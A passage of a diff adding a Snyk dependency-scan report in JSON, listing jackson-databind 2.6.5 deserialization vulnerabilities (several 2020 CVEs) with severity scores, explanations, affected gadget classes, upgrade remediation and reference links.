"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": 
"high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", 